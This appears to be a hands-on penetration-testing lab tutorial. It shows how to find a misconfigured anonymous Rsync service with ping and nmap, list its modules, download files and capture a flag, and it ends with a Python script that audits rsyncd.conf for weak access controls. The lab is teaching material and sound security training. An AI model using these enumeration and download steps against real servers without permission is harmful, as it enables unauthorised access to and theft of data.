Introduction
Welcome to this hands-on lab focused on Rsync enumeration and exploitation. Rsync is a widely used utility for synchronizing files and directories between two locations over a network. While powerful, if misconfigured, it can expose sensitive data.
In this lab, you will simulate a common scenario in penetration testing where a backup service is improperly configured. You will start by performing basic network reconnaissance to confirm the target is online. Next, you will use the nmap tool to scan for the Rsync service. Once identified, you will enumerate available shares and exploit an anonymous access configuration to download files from the target, ultimately retrieving a hidden flag.
Upon completion, you will understand how to:
- Verify network connectivity using ping.
- Scan for the Rsync service on its default port using nmap.
- Enumerate and connect to an anonymous Rsync share.
- Synchronize files from a remote target to your local machine.
Let's get started.
Verify Connectivity to Target with Ping
In this step, you will start by confirming that the target system is reachable from your machine. The ping command is a standard network diagnostic tool that sends ICMP Echo Request packets to a host to test connectivity. This is the first and most basic step in any network reconnaissance task.
Your environment includes a target system accessible via the hostname target.
Execute the following command in the terminal to send four packets to the target and verify it is online:
ping -c 4 target
You should see output similar to the following, which confirms that the target is responding to your requests. The IP address and response times may differ slightly.
PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.091 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.068 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.065 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.067 ms
--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3075ms
rtt min/avg/max/mdev = 0.065/0.072/0.091/0.011 ms
With a successful reply, you have confirmed that a stable network connection exists between your machine and the target.
Scan Open Ports with Nmap
In this step, you will use nmap to scan the target for open ports and identify running services. Nmap is a powerful tool for network discovery and security auditing. We will focus our scan on the default port for Rsync, which is 873.
Execute the following command to perform a version scan on port 873 of the target:
nmap -sV -p 873 target
Let's break down this command:
- nmap: The command to run the Network Mapper tool.
- -sV: Enables version detection, which attempts to determine the version of the service running on the open port.
- -p 873: Specifies that Nmap should only scan port 873.
After the scan completes, you will see output similar to this:
Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-12 11:20 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00012s latency).
PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
The output confirms that port 873/tcp is open and is running the rsync service. This information is critical for the next phase of our attack.
Connect to Target via Rsync
In this step, you will interact with the discovered Rsync service. The first action is to list the available "modules" or shares on the server. If anonymous access is enabled, the server will respond with a list of publicly accessible directories.
Run the following command to list the modules on the target:
rsync rsync://target
The server should respond with a list of available modules. In this case, you will see a module named public.
public Public Files
Now that you know a module named public exists, you can synchronize its contents to your local machine. We will use the -av flags: -a for archive mode (which preserves permissions, ownership, etc.) and -v for verbose output.
Execute the command below to download the contents of the public module to your current directory (.):
rsync -av rsync://target/public/ .
The command will connect to the target, transfer the files, and display a summary of the operation.
receiving incremental file list
./
flag.txt
sent 43 bytes received 121 bytes 328.00 bytes/sec
total size is 31 speedup is 0.19
The output shows that a file named flag.txt was successfully downloaded to your local directory.
Explore Target System and Locate Flag
In this final step, you will inspect the files you downloaded from the Rsync server and retrieve the flag. Since you synchronized the files to your current directory, they are now available locally for you to examine.
First, use the ls command to list the files in your current directory and confirm that flag.txt was downloaded.
ls
You should see flag.txt listed in the output.
flag.txt
Now, use the cat command to display the contents of flag.txt. This will reveal the flag you need to complete the lab.
cat flag.txt
The terminal will display the flag's value.
labex{rsync_an0nym0us_4cc3ss_fl4g}
Congratulations! You have successfully identified a misconfigured Rsync service, enumerated its shares, downloaded its contents, and captured the flag. Copy the flag value to complete the lab.
Summary
In this lab, you successfully completed a security assessment of an Rsync service, moving from reconnaissance to exploitation. You learned how to:
- Use ping to establish a baseline of network connectivity with a target.
- Employ nmap to perform a targeted port scan, identifying the open Rsync service and its version.
- Interact with an Rsync server to list publicly available modules, a key step in enumeration.
- Exploit an anonymous access misconfiguration to synchronize files from the target to your local machine.
- Locate and retrieve a flag from the downloaded files, completing the objective.
This exercise demonstrates a critical security principle: services designed for convenience, like Rsync, must be properly secured with authentication and access controls. Leaving an Rsync server open for anonymous access can lead to significant data breaches. By understanding these attack vectors, you are better prepared to secure network services.
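The anonymous module listing and download in this lab come from how the server's rsyncd.conf is written. As an added example (not part of the original lab), this Python sketch audits a config for modules that allow anonymous access, have no hosts allow restriction, or appear in module listings. The sample config is constructed, since the lab does not show the target's file, and the parser is simplified (no line continuations or &include directives).

```python
SAMPLE_CONF = """\
# Constructed sample; the lab does not show the target's rsyncd.conf.
[public]
    path = /srv/public
    comment = Public Files
    read only = yes
[backups]
    path = /srv/backups
    list = no
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
"""

# rsyncd behaviour when a parameter is absent: listed, read-only, no auth, any host.
DEFAULTS = {"list": "yes", "readonly": "yes", "authusers": "", "hostsallow": ""}
FALSE = {"no", "false", "0"}

def parse(text):
    """Return {module: params}; global parameters act as per-module defaults."""
    globals_, modules, current = dict(DEFAULTS), {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), dict(globals_))
        elif "=" in line:
            key, value = line.split("=", 1)
            key = "".join(key.split()).lower()  # whitespace in names is ignored
            (globals_ if current is None else current)[key] = value.strip()
    return modules

def audit(text):
    """Return {module: [findings]} for modules with weak access control."""
    report = {}
    for name, p in parse(text).items():
        issues = []
        if not p["authusers"]:
            issues.append("anonymous access (no 'auth users')")
            if p["readonly"].lower() in FALSE:
                issues.append("anonymous write ('read only = no')")
        if not p["hostsallow"]:
            issues.append("no 'hosts allow' restriction")
        if p["list"].lower() not in FALSE:
            issues.append("module name visible in listings ('list' enabled)")
        if issues:
            report[name] = issues
    return report
```

Calling audit(SAMPLE_CONF) reports three findings for the public module and none for backups, which sets auth users, hosts allow and list = no.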



